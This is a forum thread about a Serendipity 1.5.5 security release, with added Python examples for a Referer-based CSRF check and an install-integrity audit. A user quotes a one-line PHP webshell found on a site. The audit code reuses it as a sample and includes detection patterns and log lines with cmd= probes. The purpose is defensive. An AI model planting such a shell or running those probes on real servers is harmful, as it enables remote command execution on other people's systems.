Hi!
Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html
Regards,
Garvin
Serendipity 1.5.5 released: IMPORTANT Security Fix
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi... I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade to Serendipity 1.5.5 after the virus elimination?
Thanks
e.
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi!
tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.
If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").
HTH,
Garvin
-
- Regular
- Posts: 13
- Joined: Sat Feb 07, 2009 12:54 pm
- Location: DE
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi,
after I updated S9Y to version 1.5.5 I cannot create new entries. I get the following error alert: "Your browser did not send a valid HTTP referrer. This can be either because your browser/proxy is not configured correctly, or because you were the victim of a "Cross Site Request Forgery (XSRF)" with which someone tried to force you into unwanted changes. The requested action could therefore not be performed."
I updated 3 of my blogs. It's the same problem on each blog. I tested it on Internet Explorer 8, Firefox and Chrome! Same problem!
-
- Core Developer
- Posts: 30022
- Joined: Tue Sep 16, 2003 9:45 pm
- Location: Cologne, Germany
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Hi!
From which version did you upgrade? Did you change anything in your PHP installation and/or .htaccess?
The error usually only happens if the PHP sessions mismatch, or your browser does not submit an "HTTP Referer" string. Also make sure you log in using the blog domain name that is configured inside s9y as the HTTP host.
HTH,
Garvin
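As an added example (not Serendipity's own code), here is a Referer-based CSRF guard of the kind whose failure message is quoted above, written so that the two legitimate failure causes Garvin lists (no Referer sent at all, and logging in under a host name other than the one configured for the blog) sit next to the forgery cases such a guard must reject. The host name `blog.example.org`, the admin path and the plain header dict are assumptions for illustration; a naive prefix check is shown beside the proper one because it is the usual way to get this wrong.

```python
from urllib.parse import urlsplit

# Added example, not Serendipity's own code: a Referer-based CSRF guard of the
# kind whose failure message is quoted above. The configured host name, the
# admin path and the plain header dict are assumptions for illustration.

CONFIGURED_HOST = "blog.example.org"   # the host name entered in the blog config

def naive_referer_ok(configured_host, referer):
    """A string-prefix check: the obvious first attempt, and wrong (see below)."""
    return referer is not None and referer.startswith("http://" + configured_host)

def check_referer(configured_host, headers):
    """Return (ok, reason) for a state-changing request given its headers."""
    referer = headers.get("Referer")
    if not referer:
        # Browsers, privacy extensions and proxies do strip Referer; a guard
        # that relies on it has to fail closed here, which is exactly the
        # "no valid HTTP referrer" error a user then sees.
        return False, "no Referer header sent (browser/proxy strips it?)"
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "Referer is not an http(s) URL"
    # .hostname is lower-cased and stripped of userinfo and port, so
    # 'http://blog.example.org@evil.example/' compares as evil.example and
    # 'http://blog.example.org.evil.example/' is simply a different host.
    got, want = parts.hostname, configured_host.lower()
    if got != want:
        # Also what happens when the admin logs in via www.blog.example.org
        # while the blog is configured as blog.example.org.
        return False, f"Referer host {got!r} is not the configured host {want!r}"
    return True, "ok"

if __name__ == "__main__":
    for hdrs in ({}, {"Referer": "http://blog.example.org/serendipity_admin.php"},
                 {"Referer": "http://www.blog.example.org/serendipity_admin.php"},
                 {"Referer": "http://blog.example.org@evil.example/"}):
        print(hdrs.get("Referer"), "->", check_referer(CONFIGURED_HOST, hdrs))
```

The guard cannot tell a Referer that a proxy stripped from one that is absent because the request was forged from another site, which is why the error text names both possibilities; comparing the parsed host name rather than a string prefix is what keeps `blog.example.org@evil.example` and `blog.example.org.evil.example` out.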
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?
-
- Regular
- Posts: 3652
- Joined: Mon Feb 13, 2006 2:40 am
- Location: Chicago, IL, USA
- Contact:
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
The lite version should also be the upgraded version.
=Don=
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I haven't updated some of my blogs for years! Better do this one then!
-
- Regular
- Posts: 56
- Joined: Sun May 18, 2008 5:50 pm
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
I've just installed the new version. While checking I found a file called
1.php.png
containing the line <?PHP system($_GET['cmd']); ?>
Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
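The two file questions in this thread, the packed tag-lib.js that an AV flagged as "Obfuscated" and the 1.php.png shell found after the upgrade, are answered by the same check: compare the installed tree against a pristine copy of the release and look at whatever differs or is extra. The following is an added example, not Serendipity's own code; it builds a constructed release tree and a constructed install in a temp directory, diffs them by SHA-256 (a packed file identical to the release copy comes out clean whatever a heuristic AV says), flags PHP code hiding under a non-PHP extension, and picks the matching requests out of constructed access-log lines. Every file name, file content and log line in it is made up.

```python
import hashlib
import os
import re
import tempfile

# Added example, not Serendipity's own code. Builds a constructed "release" and
# "install" tree, diffs them by SHA-256, flags PHP code under a non-PHP
# extension (1.php.png) and triages constructed access-log lines. All file
# names, contents and log lines are made up.

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# A one-liner that hands request input straight to a shell or eval function.
SHELL_CALL = re.compile(
    rb"\b(system|exec|passthru|shell_exec|eval)\s*\(\s*\$_(GET|POST|REQUEST)",
    re.IGNORECASE)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3})')
DOUBLE_EXT = re.compile(r"\.php\.(jpe?g|png|gif)(\?|$)", re.IGNORECASE)

def walk_files(root):
    """Yield (relative POSIX path, bytes) for every file under root."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            with open(full, "rb") as fh:
                yield os.path.relpath(full, root).replace(os.sep, "/"), fh.read()

def manifest_of(pristine_root):
    """SHA-256 per file of an unpacked, verified copy of the official release."""
    return {rel: hashlib.sha256(data).hexdigest() for rel, data in walk_files(pristine_root)}

def write_tree(base, files):
    """Materialise a {relative path: bytes} dict on disk (used to build the samples)."""
    for rel, data in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

def audit_install(root, manifest):
    """Diff an installed tree against the release manifest and scan file contents."""
    report = {"modified": [], "extra": [], "missing": [],
              "php_in_nonphp": [], "webshell_like": []}
    seen = set()
    for rel, data in walk_files(root):
        seen.add(rel)
        if rel not in manifest:
            report["extra"].append(rel)
        elif manifest[rel] != hashlib.sha256(data).hexdigest():
            report["modified"].append(rel)
        if rel.rsplit(".", 1)[-1].lower() != "php" and PHP_TAG.search(data):
            report["php_in_nonphp"].append(rel)
        if SHELL_CALL.search(data):
            report["webshell_like"].append(rel)
    report["missing"] = list(set(manifest) - seen)
    return {k: sorted(v) for k, v in report.items()}

def suspicious_requests(log_lines):
    """Return (ip, path, status, reasons) for requests worth a second look."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        reasons = []
        if DOUBLE_EXT.search(path):
            reasons.append("double extension")
        if re.search(r"(^|&)cmd=", path.partition("?")[2]):
            reasons.append("cmd= parameter")
        if reasons:
            hits.append((m.group("ip"), path, m.group("status"), reasons))
    return hits

# Constructed log lines: two probes for files that do not exist (404), one hit
# on the shell that does (200), and an ordinary page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:10:11:12 +0100] "GET /uploads/1.php.jpg?cmd=id HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2011:10:11:13 +0100] "GET /uploads/2.php.jpg HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2011:10:11:14 +0100] "GET /uploads/1.php.png?cmd=uname%20-a HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2011:10:12:00 +0100] "GET /index.php?/archives/1-hello.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def run_demo():
    """Build the constructed release and install trees, then run both checks."""
    packed_js = b"eval(function(p,a,c,k,e,d){/* constructed stand-in for packed JS */})"
    index_php = b"<?php echo 'hello';\n"
    with tempfile.TemporaryDirectory() as tmp:
        pristine, install = os.path.join(tmp, "release"), os.path.join(tmp, "htdocs")
        write_tree(pristine, {"plugins/QuickTag/tag-lib.js": packed_js, "index.php": index_php})
        write_tree(install, {
            "plugins/QuickTag/tag-lib.js": packed_js,                 # identical to release
            "index.php": index_php + b"// locally edited\n",          # differs from release
            "uploads/1.php.png": b"<?PHP system($_GET['cmd']); ?>",  # not in the release
        })
        report = audit_install(install, manifest_of(pristine))
    return report, suspicious_requests(SAMPLE_LOG)
```

Against a real install, unpack the official archive of the same version into the pristine directory (after checking the download's published hash), point `audit_install` at the web root and feed the real access log to `suspicious_requests`. Packed tag-lib.js shows up in none of the lists because it is byte-identical to the release; the shell shows up as extra, as PHP under an image extension and as a shell-like call all at once. In the log, the 404s are probes and the 200 is the one that matters, since it means the server executed the file: whether a name like 1.php.png runs as PHP at all depends on the handler mapping (Apache's `AddHandler` matches any extension in the name, a `SetHandler` restricted to `\.php$` does not).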
Re: Serendipity 1.5.5 released: IMPORTANT Security Fix
Looks like I should update. I have over 50 blogs that I haven't updated in years.